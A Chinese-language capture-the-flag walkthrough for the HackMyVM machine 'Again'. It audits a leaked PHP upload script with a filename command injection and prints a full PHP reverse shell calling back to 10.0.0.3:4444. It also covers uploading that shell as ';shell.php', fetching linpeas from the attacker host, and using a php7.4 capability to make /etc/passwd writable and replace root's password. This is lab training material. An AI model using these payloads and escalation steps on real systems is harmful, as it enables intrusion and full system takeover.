靶机信息
下载地址:
- https://hackmyvm.eu/machines/machine.php?vm=Again
网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r
靶场: HackMyVm.eu
靶机名称: Again
难度: 困难
发布时间: 2021年10月11日
提示信息:
- 无
目标: user.txt和root.txt
实验环境
- 攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
- sudo netdiscover -r 10.0.0.0/24 -i eth1
扫描到主机地址为10.0.0.117
扫描端口
扫描靶机开放的服务端口
- sudo nmap -sC -sV -p- 10.0.0.139 -oN nmap.log
扫描到开放22和80端口,先来看看80端口
Web渗透
访问后只有一个上传功能,打开源码后发现一段提示“Kerszi,删除.bck文件”,来做个目录扫描查找.bck文件
- gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.139 -x bck
发现upload.bck文件,尝试下载
- wget http://10.0.0.139/upload.bck
来看看upload.bck是什么文件
- file upload.bck
php脚本文件,查看下内容
PHP代码审计
- <?php
if (!isset($_FILES["myFile"])) {
die("There is no file to upload.");//判断是是否有文件上传
}
$filepath = $_FILES['myFile']['tmp_name'];//文件路径
$fileSize = filesize($filepath);//文件大小
$fileinfo = finfo_open(FILEINFO_MIME_TYPE);//通过MIME判断文件类型
$filetype = finfo_file($fileinfo, $filepath);
if ($fileSize === 0) {
die("The file is empty.");//判断文件是否为空
}
$allowedTypes = [
'image/jpeg' => 'jpg',
'text/plain' => 'txt'
];//文件类型
if (!in_array($filetype, array_keys($allowedTypes))) {
echo $filetype;
die("File not allowed.");//如果上传的文件不在$allowedTypes中结束
}
$filename = basename($filepath);
$extension = $allowedTypes[$filetype];
$newFilepath = $_FILES['myFile']['name'];
if (!copy($filepath, $newFilepath)) {
die("Can't move file.");//将临时目录下的文件复制到到当前目录
}
$blacklistchars = '"%'*|$;^`{}~\#=&';
if (preg_match('/[' . $blacklistchars . ']/', $newFilepath)) {
echo ("No valid character detected");//检查上传文件名是否包含'"%'*|$;^`{}~\#=&'这些字符,如果没有退出
exit();
}
if ($filetype === "image/jpeg"){ //如果上传的是图片
echo $newFilepath;
$myfile = fopen("outputimage.php", "w") or die("Unable to open file!"); //打开一个可写文件
$command = "base64 ".$newFilepath;
$output = shell_exec($command); //将文件bash64编码后执行
unlink($newFilepath); //删除文件
echo "File uploaded";
$lol = '<img src="data:image/png;base64,'.$output.'" alt="Happy" />';
fwrite($myfile, $lol);
}
else{ //如果上传文件不是jpeg那就是text
$myfile2 = fopen("outputtext.txt", "w") or die("Unable to open file!"); //打开一个可写文件
$command = "cat ".$newFilepath; //执行cat 命令将文件内容给变量$command
$output = shell_exec($command); //执行$command,
unlink($newFilepath); //删除文件
echo "File uploaded";
fwrite($myfile2, $output); //将执行结果写入outputtext.txt
}
?>
看完源码,需要将webshell伪装mime为txt文件并且文件名要包含'"%'*|$;^`{}~\#=&'
,最后要保证文件不能被删除,来验证一下。
1。准备一个反弹shell
shell.php
- <?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.0.3'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$stringn";
}
}
?>
2。修改文件名字和mime类型
- cp shell.php ;shell.php
3。修改;shell.php文件在最上方添加“RANDOM TEXT TO MAKE THE SCRIPT THINK IT IS A TEXT FILE”字符串。
- vi ;shell.php
4。攻击机监听4444端口
- rlwrap nc -lvvp 4444
5。上传并访问shell
上传后提示No valid character detected,不用管继续访问shell
- http://10.0.0.139/;shell.php
反弹成功,来找找敏感信息
- cd /var/www/html
ls
cat id_rsa.bck
找到id_rsa的备份文件,把他下载下来
- wget http://10.0.0.139/id_rsa.bck
下载完继续找敏感信息
- cat /etc/passwd
发现一个可登录的用户,尝试用key登录SSH
- chmod 600 id_rsa.bck
需要密码,上传辅助脚本检查
1。攻击机在辅助脚本目录下开启HTTP服务
- python3 -m http.server
2。靶机下载脚本linpeas.sh并执行
- cd /tmp
wget http://10.0.0.3:8000/linpeas.sh
- chmod +x linpeas.sh
./linpeas.sh
发现/usr/bin/php7.4拥有特权,来看看php如何提权
- https://gtfobins.github.io/gtfobins/php/#capabilities
可以修改其他文件权限,验证一下
- php7.4 -r 'chmod("/etc/passwd", 0666);'
拿到passwd的读写权限,生成密码修改passwd文件中root的密码
1。生成md5加密密码
- openssl passwd -1 123123
2。修改passwd文件
修改完成,切换到root用户
- su
id
拿到root权限,找找flag
- cat /home/kerszi/user.txt
cat /root/r00t.txt
拿到user.txt和r00t.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试练习No.74 HackMyVm Again
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论